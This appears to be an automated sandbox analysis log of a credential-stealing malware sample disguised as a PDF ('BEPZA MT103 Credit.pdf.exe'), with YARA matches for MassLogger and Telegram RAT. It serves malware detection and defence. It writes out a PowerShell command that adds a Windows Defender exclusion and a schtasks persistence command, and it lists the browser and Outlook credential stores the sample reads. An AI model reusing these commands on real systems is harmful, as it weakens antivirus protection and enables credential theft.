Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 596032 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595907 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595797 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595438 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 595094 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594962 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594621 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594516 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594297 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Thread delayed: delay time: 594188 Jump to behavior
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711942483.0000000001001000.00000004.00000020.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3711945481.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Memory written: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Memory written: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp" Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected MSIL Logger
Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Yara detected MassLogger RAT
Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected MSIL Logger
Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3710700225.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Yara detected MassLogger RAT
Source: Yara match File source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: YEGIgzyAhkvT.exe PID: 8120, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE
